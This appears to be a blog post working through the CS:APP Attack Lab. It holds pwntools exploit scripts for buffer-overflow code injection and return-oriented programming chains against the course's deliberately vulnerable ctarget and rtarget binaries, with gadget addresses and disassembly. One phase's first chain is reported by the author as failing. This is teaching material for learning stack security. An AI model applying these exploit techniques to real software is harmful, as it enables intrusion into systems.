CSAPP-Attack Lab

发布于 2022-03-27  119 次阅读


Introduction

Note: This is the 64-bit successor to the 32-bit Buffer Lab. Students are given a pair of
unique custom-generated x86-64 binary executables, called targets, that have buffer
overflow bugs. One target is vulnerable to code injection attacks. The other is vulnerable
to return-oriented programming attacks. Students are asked to modify the behavior of the 
targets by developing exploits based on either code injection or return-oriented 
programming. This lab teaches the students about the stack discipline and teaches them 
about the danger of writing code that is vulnerable to buffer overflow attacks.
If you're a self-study student, here are a pair of Ubuntu 12.4 targets that you can 
try out for yourself. You'll need to run your targets using the "-q" option so that 
they don't try to contact a non-existent grading server. If you're an instructor 
with a CS:APP acount, you can download the solutions here.
这是32位缓冲区lab的64位后续版本. 学生将获得一对独特的定制生成的 x86-64 二进制可执行文件,
称为目标,它们具有缓冲区溢出错误. 一个目标容易受到代码注入攻击. 另一个是脆弱的
面向返回的编程攻击. 要求学生通过基于代码注入或面向返回的编程开发漏洞来修改目标的行为.
该实验室向学生讲授堆栈规则,并教他们编写易受缓冲区溢出攻击的代码的危险.
....

一:Overview

This directory contains the files that you will use to build and run the CS:APP Attack Lab.
The purpose of the Attack Lab is to help students develop a detailed understanding of the 
stack discipline on x86-64 processors. It involves applying a total of five buffer 
overflow attacks on some executable files. There are three code injection attacks and two 
return-oriented programming attacks.The lab must be done on an x86-64 Linux system. 
It requires a version of gcc that supports the -Og optimization flag (e.g., gcc 4.8.1). 
We've tested it at CMU on Ubuntu 12.4 systems.
此目录包含您将用于构建和运行 CS:APP Attack Lab 的文件。Attack Lab 的目的是帮助学生详细了解 
x86-64 处理器上的堆栈规则。 它涉及对一些可执行文件应用总共五次缓冲区溢出攻击。 
有三种代码注入攻击和两种面向返回的编程攻击。
该实验必须在 x86-64 Linux 系统上完成。 它需要支持 -Og 优化标志的 gcc 版本(例如,gcc 4.8.1)。 我们已经在 Ubuntu 12.4 系统上的 CMU 上对其进行了测试。

1.1. Targets

Students are given binaries called ctarget and rtarget that have a
buffer overflow bug.  They are asked to alter the behavior of their
targets via five increasingly difficult exploits. The three attacks on
ctarget use code injection. The two attacks on rtarget use
return-oriented programming.
给学生一个名为 ctarget 和 rtarget 的二进制文件,它们具有缓冲区溢出错误. 
他们被要求改变他们的行为通过五个越来越困难的攻击目标. 三种攻击方式ctarget使用代码注入. 
rtarget使用的两种攻击方式面向回报的编程.

1.2. Solving Targets

Each exploit involves reading a sequence of bytes from standard input
into a buffer stored on the stack. Students encode each exploit string
as a sequence of hex digit pairs separated by whitespace, where each
hex digit pair represents a byte in the exploit string. The program
"hex2raw" converts these strings into a sequence of raw bytes, which
can then be fed to the target:
 
    unix> cat exploit.txt | ./hex2raw | ./ctarget

Each student gets their own custom-generated copy of ctarget and
rtarget.  Thus, students must develop the solutions on their own and
cannot use the solutions from other students.

The lab writeup has extensive details on each phase and solution
techniques. We suggest that you read the writeup carefully before
continuing with this README file.
每个漏洞利用都涉及从标准输入读取字节序列到存储在堆栈上的缓冲区中。学生将每个漏洞利用字符串编
码为由空格分隔的一系列十六进制数字对,其中每个十六进制数字对代表漏洞利用字符串中的一个字节。 
程序“hex2raw”将这些字符串转换为原始字节序列,然后可以将其提供给目标:
     unix> cat exploit.txt | ./hex2raw | ./ctarget

1.3. Autograding Service

As with the Bomb and Bufer Labs, we have created a stand-alone
user-level autograding service that handles all aspects of the Attack
Lab for you: Students download their targets from a server. As the
students work on their targets, each successful solution is streamed
back to the server. The current results for each target are displayed
on a Web "scoreboard."  There are no explicit handins and the lab is
self-grading.

The autograding service consists of four user-level programs that run
in the main ./attacklab directory:

- Request Server (attacklab-requestd.pl). Students download their
targets and display the scoreboard by pointing a browser at a simple
HTTP server called the "request server." The request server builds the
target files, archives them in a tar file, and then uploads the resulting tar
file back to the browser, where it can be saved on disk and
untarred. The request server also creates a copy of the targets and their
solutions for the instructor in the targets/ directory.

- Result Server (attacklab-resultd.pl). Each time a student correctly
solves a target phase, the target sends a short HTTP message, called an
"autoresult string," to an HTTP "result server," which simply appends
the autoresult string to a "scoreboard log file" called log.txt.

- Report Daemon (attacklab-reportd.pl). The "report daemon"
periodically scans the scoreboard log file. The report daemon finds
the most recent autoresult string submitted by each student for each
phase, and validates these strings by applying them to a local copy of
the student's targets.  It then updates the HTML scoreboard
(attacklab-scoreboard.html) that summarizes the current number of
solutions for each target, rank ordered by the total number of accrued
points.

- Main daemon (attacklab.pl). The "main daemon" starts and nannies the
request server, result server, and report daemon, ensuring that
exactly one of these processes (and itself) is running at any point in
time. If one of these processes dies for some reason, the main daemon
detects this and automatically restarts it. The main daemon is the
only program you actually need to run.

二. Files

The ./attacklab directory contains the following files:

Makefile                - For starting/stopping the lab and cleaning files
attacklab.pl*           - Main daemon that nannies the other servers & daemons
Attacklab.pm            - Attacklab configuration file   
attacklab-reportd.pl*   - Report daemon that continuously updates scoreboard
attacklab-requestd.pl*  - Request server that serves targets to students
attacklab-resultd.pl*   - Result server that gets autoresult strings from targets
attacklab-scoreboard.html - Real-time Web scoreboard
attacklab-update.pl     - Helper to attacklab-reportd.pl that updates scoreboard
targets/                - Contains unique targets generated for each student, with solutions
log-status.txt          - Status log with msgs from various servers and daemons
log.txt                 - Scoreboard log of autoresults received from targets
scores.csv              - Summarizes current scoreboard scores for each student
src/                    - Attacklab source files
validate.pl             - Called periodically by report daemon. Validates solutions 
                          for each student, and updates scoreboard and scores files. 
writeup/                - Sample Latex Attack Lab writeup

三:Solutions

TargetID: Each target in a given instance of the lab has a unique
non-negative integer called the "targetID."

The five solutions for target n are avalable to you in the
targets/target<n> directory, in the following files: 

Phase 1: ctarget.l1,
Phase 2: ctarget.l2, 
Phase 3: ctarget.l3, 
Phase 4: rtarget.l2, 
Phase 5: rtarget.l3, 

where "l" stands for level.

四:Attack

x86-64 架构的寄存器有一些使用习惯,比如:

  • 用来传参数的寄存器:%rdi, %rsi, %rdx, %rcx, %r8, %r9
  • 保存返回值的寄存器:%rax
  • 被调用者保存状态:%rbx, %r12, %r13, %r14, %rbp, %rsp
  • 调用者保存状态:%rdi, %rsi, %rdx, %rcx, %r8, %r9, %rax, %r10, %r11
  • 栈指针:%rsp
  • 指令指针:%rip

函数调用前需要把某些以后仍旧需要用到的值保存起来。

level1

Your task is to get CTARGET to execute the code for touch1 when getbuf executes its 
return statement,rather than returning to test.
calculate the distence and jump directly to touch1

stack  : padding(00..) + touch1(0x4017c0)

main函数中的stable_launch —> launch —> test —> getbuf 函数有gets函数导致的栈溢出

unsigned int __cdecl getbuf()
{
  char buf[32]; // [rsp+0h] [rbp-28h] BYREF

  Gets(buf);
  return 1;
}

我们想要覆盖到他的返回地址必须填充0x28+new_adr(0x4017C0)

payload:

# _*_ coding: utf-8 _*_
# editor: SYJ
# function: hacked by syj
from pwn import *
context(log_level='debug')
sh = process(argv=['./ctarget', '-q'])       # process指定命令行参数启动
payload = (0x28)*'A' + p64(0x4017C0)
sh.sendline(payload)
sh.interactive()

level2

Your task is to get CTARGET to execute the code for touch2 rather than returning to test. 
In this case,however, you must make it appear to touch2 as if you have passed your cookie 
as its argument.
您的任务是让ctarget执行touch2的代码,而不是返回test。
但是,在这种情况下,您必须使它和touch2一样,就好像您已将cookie作为其参数传递一样。
"""
....
....
覆盖ret_adr到去gadget执行如下指令
pop rdi
retn
"""

# 所以我们必须像如下这样先gets在栈中构造好:
"""
(0x28)*a + gadget_addr + cookie + touch2_addr
"""

分析getbuf函数中的指令从而理解为什么要这样构造:

.text:00000000004017A8 ; __unwind {
.text:00000000004017A8                 sub     rsp, 28h
.text:00000000004017AC                 mov     rdi, rsp
.text:00000000004017AF                 call    Gets
.text:00000000004017B4                 mov     eax, 1
.text:00000000004017B9                 add     rsp, 28h
.text:00000000004017BD                 retn
.text:00000000004017BD ; } // starts at 4017A8
.text:00000000004017BD getbuf          endp

Gets输入在栈中构造好我们的数据之后,add rsp 0x28就会将栈恢复,retn就会将栈中我们存放的gadget_addr弹出给rip,然后程序就会去执行gadget的两条指令,pop rdi指令会将栈中我们存放好的cookie弹出给rdi,retn会将touch2_addr弹出给rip,这样程序就会去执行touch2,同时rdi中也存放着我们的cookie

# _*_ coding: utf-8 _*_
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./ctarget', '-q'])       # process指定命令行参数启动
gadget_addr = 0x000000000040141b
cookie = 0x59b997fa
touch2_addr = 0x00000000004017EC
payload = (0x28)*'A' + p64(gadget_addr) +p64(0x59b997fa) + p64(touch2_addr)
sh.sendline(payload)
sh.interactive()

其中的gadget是用ROPgadget来查出来的

验证:

level3

Your task is to get CTARGET to execute the code for touch3 rather than returning to test.
You mustmake it appear to touch3 as if you have passed a string representation of your 
cookie as its argument.
每次运行时堆栈中的地址都保持不变,在堆栈中存储一个字符串。(hex值0x59b997fa的字符串形式'59b997fa')
参数设置方法与级别2相同.

分析方法和前面相同,只是rdi存放的是字符串指针(这个就是后面栈中存放字符串的首地址),最后在栈中放上那个字符串

# _*_ coding: utf-8 _*_
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./ctarget', '-q'])       # process指定命令行参数启动
gadget_addr = 0x000000000040141b
string_start_addr = 0x000000005561DCB8
touch3_addr = 0x00000000004018FA
# rdi传递的字符串指针(首地址)
payload = (0x28)*'A' + p64(gadget_addr) +p64(string_start_addr) + p64(touch3_addr) + '59b997fa'
sh.sendline(payload)
sh.interactive()

验证:

level4

从前面我们可以知道,有缓冲区加上缓冲区的代码可以执行使得程序非常容易被攻击,但是在 rtarget 中使用了两个技术来防止这种攻击:

  • 每次栈的位置是随机的,于是我们没有办法确定需要跳转的地址
  • 即使我们能够找到规律注入代码,但是栈是不可执行的,一旦执行,则会遇到段错误

既然栈不能存放代码,那就用程序的指令来执行我们想要程序执行的逻辑

先找到一个pop rax;ret; gadgetone

然后再找一个mov rdi, rax;ret; gadgettwo

gadgetone_addr = 0x4019ab

gadgettwo_addr = 0x4019a2

再跳转到touch2函数即可

所以我们必须先在栈中构造出如下数据

0x28的任意填充 + gadgetone_addr + cookie + gadgettwo_addr + touch2_addr

payload:

# _*_ coding: utf-8 _*_
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./rtarget', '-q'])       # process指定命令行参数启动
gadgetone_addr = 0x4019ab
gadgettwo_addr = 0x4019a2
cookie = 0x59b997fa
touch2_addr = 0x00000000004017EC
payload = (0x28)*'A' + p64(gadgetone_addr) +p64(cookie) + p64(gadgettwo_addr) + p64(touch2_addr)
sh.sendline(payload)
sh.interactive()

level5

既然开启了PIE,那么肯定栈的地址就会改变,继续用level3的脚本那个string_start_addr就不正确

(但是不知道为什么这个rtarget我这里也没开PIE, 所以导致可以继续用level3的脚本),但是这里我们就假装它有好吧,这样我们就只有一个string_start_addr不知道,但是既然我们是在栈中存放的字符串,只要能找到一个指令,比如mov ?, rsp,就可以得到栈的地址从而获取到我们在栈中存放的字符串的首地址

查找我们要用的指令:

syj@ubuntu:~/csapp/attacklab$ ROPgadget --binary rtarget  --only 'mov|ret' | grep 'rax'
0x0000000000401b23 : mov byte ptr [rax + 0x605500], 0 ; ret
0x000000000040214d : mov qword ptr [rdi + 8], rax ; ret
0x0000000000401a06 : mov rax, rsp ; ret
0x0000000000401a99 : mov rax, rsp ; ret 0x8dc3
0x00000000004019a2 : mov rdi, rax ; ret
syj@ubuntu:~/csapp/attacklab$ ROPgadget --binary rtarget  --only 'pop|ret' | grep 'rsi'
0x0000000000402b17 : pop rsi ; pop r15 ; ret
0x0000000000401383 : pop rsi ; ret
syj@ubuntu:~/csapp/attacklab$ ROPgadget --binary rtarget  --only 'lea|ret' | grep 'rax'
0x00000000004019d6 : lea rax, [rdi + rsi] ; ret

(0x0000000000401a06)mov rax, rsp
retn
(0x00000000004019a2)mov rdi, rax
retn           //获取栈顶的地址

(0x0000000000401383)pop rsi  //将栈中我们事先存放好的后面会用到的偏移量取出到rsi中
retn

(0x00000000004019d6)lea rax, [rdi + rsi]   //等价于rax = rdi+rsi
ret            //获取栈中的一个地址(我们存放字符串的地址)

(0x00000000004019a2)mov rdi, rax 
ret            //将我们存放的字符串的首地址传递给rdi

构造栈中的数据:

0x28*A + 0x401a06 + 0x4019a2(获得的rsp就是存放这个值在栈中的地址) + 0x401383 + 
存放的栈中偏移(48) + 0x4019d6 + 0x4019a2 + touch3_addr + '59b997fa'

payload:

但是我打的时候还是没打通,我调试了一下,能够成功进入touch3函数,且rdi就是cookie,但是在hexmatch里面的__sprintf_chk报错了

# _*_ coding: utf-8 _*_
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./rtarget', '-q'])       # process指定命令行参数启动
# rdi传递的字符串指针(首地址)
touch3_addr = 0x00000000004018FA
payload = 0x28*'a' + p64(0x401a06) + p64(0x4019a2) + p64(0x401383) + p64(48) + p64(0x4019d6) + p64(0x4019a2) + p64(touch3_addr) + '59b997fa'
sh.sendline(payload)
sh.interactive()

然后查了下别人写过的

与他比较我的就是把中间的那一段都给简化了,直接pop给rsi了

movq %rsp,%rax 0x401a03
movq %rax,%rdi 0x4019c3
popq rax 0x4019ca

%eax -> %edx -> %ecx -> %esi
movq %eax,%edx 0x4019db
movq %edx,%ecx 0x401a68
movq %ecx,%esi 0x401a11

lea %rdi + %rsi* 1, %rax 0x4019d6
movq %rax,%rdi 0x4019c3

然后用他的思路写个payload

ROPgadget --binary rtarget  --only 'mov|ret' | grep 'rax'

然后就打通了....

from pwn import *
context(log_level='debug')
sh = process(argv=['./rtarget', '-q'])       # process指定命令行参数启动
# rdi传递的字符串指针(首地址)
touch3_addr = 0x00000000004018FA
payload = 0x28*'a' + p64(0x401a06) + p64(0x4019c5) + p64(0x4019cc) + p64(0x48) + p64(0x4019dd) + p64(0x401a69) + p64(0x401a13) + p64(0x4019d6) + p64(0x4019c5) + p64(touch3_addr) + '59b997fa'
sh.sendline(payload)
sh.interactive()
"""
.text:0000000000401A06                 mov     rax, rsp
.text:0000000000401A09                 retn

.text:00000000004019C5                 mov     rdi, rax
.text:00000000004019C8                 nop
.text:00000000004019C9                 retn

.text:00000000004019CC                 pop     rax
.text:00000000004019CD                 nop
.text:00000000004019CE                 retn

.text:00000000004019DD                 mov     edx, eax
.text:00000000004019DF                 nop
.text:00000000004019E0                 retn

.text:0000000000401A69                 mov     ecx, edx
.text:0000000000401A6B                 or      bl, bl
.text:0000000000401A6D                 retn

.text:0000000000401A13                 mov     esi, ecx      //不知道为什么把这一段换成pop rsi就不行
.text:0000000000401A15                 nop
.text:0000000000401A16                 nop
.text:0000000000401A17                 retn

.text:00000000004019D6                 lea     rax, [rdi+rsi]
.text:00000000004019DA                 retn

.text:00000000004019C5                 mov     rdi, rax
.text:00000000004019C8                 nop
.text:00000000004019C9                 retn
"""

https://agate-colony-3f5.notion.site/Attack-Lab-be5f328cfef4443b8f642a5e2fc89a8b


一沙一世界,一花一天堂。君掌盛无边,刹那成永恒。